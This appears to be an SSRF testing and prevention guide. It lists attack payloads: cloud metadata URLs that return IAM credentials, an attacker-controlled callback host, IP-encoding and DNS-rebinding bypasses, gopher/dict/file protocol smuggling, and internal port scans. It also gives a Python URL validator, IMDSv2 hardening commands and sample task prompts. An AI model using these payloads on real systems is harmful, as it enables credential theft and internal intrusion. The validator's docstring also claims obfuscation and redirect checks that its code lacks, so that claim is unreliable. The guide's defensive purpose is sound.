ssrf-detection

Normal flow:
  User → Server → External API (intended)

SSRF attack:
  User sends: url=http://169.254.169.254/latest/meta-data/
  Server → AWS Metadata Service (unintended)
  Server returns: IAM credentials, instance info, etc.

Request:  GET /fetch?url=http://internal-api:8080/admin/users
Response: {"users": [...all internal user data...]}

The attacker sees the response from the internal service.

1. Timing differences:
   url=http://10.0.0.1:22 (SSH port — fast connection)
   url=http://10.0.0.1:12345 (closed port — timeout)
   Different response times confirm port is open/closed

2. Out-of-band callbacks:
   url=http://attacker-controlled.burpcollaborator.net
   If the server sends a DNS/HTTP request to your server, SSRF confirmed

3. Error message differences:
   url=http://10.0.0.1 → "Connection refused" (host exists)
   url=http://10.0.0.99 → "Host unreachable" (host doesn't exist)

1. IDENTIFY input points that accept URLs:
   - Search for parameters: url=, uri=, path=, src=, dest=, redirect=,
     link=, feed=, host=, site=, callback=, webhook=, proxy=
   - Look for features: "import from URL", "add webhook", "preview link"

2. TEST with external callback:
   url=http://your-burp-collaborator.com
   url=http://your-server.com/ssrf-test
   → If you receive the request, basic SSRF confirmed

3. TEST internal access:
   url=http://localhost
   url=http://127.0.0.1
   url=http://[::1]                    # IPv6 localhost
   url=http://169.254.169.254          # AWS metadata
   url=http://metadata.google.internal # GCP metadata
   url=http://100.100.100.200          # Azure metadata

4. MAP internal network:
   url=http://10.0.0.1 through url=http://10.0.0.255
   url=http://172.16.0.1 through url=http://172.31.255.255
   url=http://192.168.0.1 through url=http://192.168.255.255
   → Use response time/error differences to identify live hosts

5. SCAN internal ports:
   url=http://10.0.0.5:22    (SSH)
   url=http://10.0.0.5:3306  (MySQL)
   url=http://10.0.0.5:6379  (Redis)
   url=http://10.0.0.5:9200  (Elasticsearch)

AWS (most impactful — can yield IAM credentials):
  http://169.254.169.254/latest/meta-data/
  http://169.254.169.254/latest/meta-data/iam/security-credentials/
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
  → Returns: AccessKeyId, SecretAccessKey, Token

GCP:
  http://metadata.google.internal/computeMetadata/v1/
  Header required: Metadata-Flavor: Google
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Azure:
  http://169.254.169.254/metadata/instance?api-version=2021-02-01
  Header required: Metadata: true

DigitalOcean:
  http://169.254.169.254/metadata/v1/

IP address obfuscation:
  127.0.0.1      → 2130706433 (decimal)
  127.0.0.1      → 0x7f000001 (hex)
  127.0.0.1      → 0177.0.0.1 (octal)
  127.0.0.1      → 127.1 (short form)
  127.0.0.1      → 0 (on some systems)

DNS rebinding:
  Register a domain that resolves to 127.0.0.1
  First resolution → external IP (passes allowlist check)
  Second resolution → 127.0.0.1 (actual request)
  Tools: rebind.it, taviso/rbndr

URL parsing tricks:
  http://evil.com#@expected.com    # Fragment confusion
  http://expected.com@evil.com     # Username in URL
  http://evil.com/..;/internal     # Path traversal
  http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ           # Unicode normalization

Protocol smuggling:
  gopher://127.0.0.1:6379/_*3%0d%0a...  # Redis commands via gopher
  dict://127.0.0.1:6379/info             # Redis info via dict protocol
  file:///etc/passwd                      # Local file read

# ssrf_prevention.py
# Validate URLs to prevent SSRF attacks

import ipaddress
import socket
from urllib.parse import urlparse

BLOCKED_NETWORKS = [
    ipaddress.ip_network('10.0.0.0/8'),        # Private
    ipaddress.ip_network('172.16.0.0/12'),      # Private
    ipaddress.ip_network('192.168.0.0/16'),     # Private
    ipaddress.ip_network('127.0.0.0/8'),        # Loopback
    ipaddress.ip_network('169.254.0.0/16'),     # Link-local (metadata)
    ipaddress.ip_network('100.64.0.0/10'),      # Carrier-grade NAT
    ipaddress.ip_network('::1/128'),            # IPv6 loopback
    ipaddress.ip_network('fc00::/7'),           # IPv6 private
    ipaddress.ip_network('fe80::/10'),          # IPv6 link-local
]

def validate_url(url: str) -> bool:
    """Validate a user-provided URL is safe to fetch.
    
    Checks: scheme allowlist, DNS resolution to non-private IP,
    no IP address obfuscation, no redirect to internal networks.
    
    Args:
        url: User-provided URL to validate
    
    Returns:
        True if URL is safe to fetch
    
    Raises:
        ValueError: If URL is blocked for SSRF prevention
    """
    parsed = urlparse(url)
    
    # 1. Scheme allowlist — only http and https
    if parsed.scheme not in ('http', 'https'):
        raise ValueError(f"Blocked scheme: {parsed.scheme}")
    
    # 2. No IP addresses in URL — force DNS resolution
    hostname = parsed.hostname
    if not hostname:
        raise ValueError("No hostname in URL")
    
    # 3. Resolve DNS and check against blocked networks
    try:
        resolved_ips = socket.getaddrinfo(hostname, parsed.port or 443)
    except socket.gaierror:
        raise ValueError(f"Cannot resolve: {hostname}")
    
    for family, type_, proto, canonname, sockaddr in resolved_ips:
        ip = ipaddress.ip_address(sockaddr[0])
        for network in BLOCKED_NETWORKS:
            if ip in network:
                raise ValueError(
                    f"Blocked: {hostname} resolves to private IP {ip}"
                )
    
    return True

# AWS: Require IMDSv2 (token-based) — blocks SSRF because
# the attacker can't set the required PUT header through SSRF
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890 \
  --http-tokens required \
  --http-endpoint enabled

# GCP: Metadata service already requires header
# Metadata-Flavor: Google — blocks basic SSRF
# But some HTTP libraries add custom headers from redirects

# Network-level: Block metadata IP in firewall rules
iptables -A OUTPUT -d 169.254.169.254 -j DROP  # Nuclear option
# Better: use IMDSv2 + application-level URL validation

1. NETWORK SEGMENTATION
   Don't let web servers reach internal services directly.
   Use a dedicated proxy/gateway for outbound requests.

2. DEDICATED FETCHER SERVICE
   Move URL fetching to an isolated microservice with:
   - Its own network policy (can't reach internal services)
   - Allowlist of permitted destination domains
   - Response size limits
   - Timeout limits

3. DNS RESOLUTION PINNING
   Resolve DNS BEFORE making the request.
   Use the resolved IP for the actual connection.
   This prevents DNS rebinding attacks.

4. DISABLE UNNECESSARY PROTOCOLS
   Block: gopher://, file://, dict://, ftp://
   Allow only: http://, https://

Our web application has a "fetch URL" feature that generates link previews. Test it for SSRF vulnerabilities: check if it can reach internal services (localhost, private IPs, cloud metadata), test filter bypasses (IP encoding, DNS rebinding, protocol smuggling), and map any accessible internal network. For each finding, demonstrate the impact and provide a proof-of-concept. We're running on AWS EC2.

Our Node.js application has an endpoint that accepts a URL and fetches content for preview cards (similar to Slack's link unfurling). It currently uses axios with no validation. Implement comprehensive SSRF prevention: URL validation with DNS resolution checks, private IP blocking (including IPv6), scheme allowlist, redirect following with re-validation at each hop, timeout and size limits, and IMDSv2 enforcement on our AWS infrastructure.

Audit our AWS infrastructure for SSRF exposure. Check all EC2 instances for IMDSv1 (should be IMDSv2 only), review security groups for overly permissive internal access, identify application endpoints that accept URLs, and verify network segmentation between web-facing services and internal databases. Produce a risk report with prioritized remediation steps.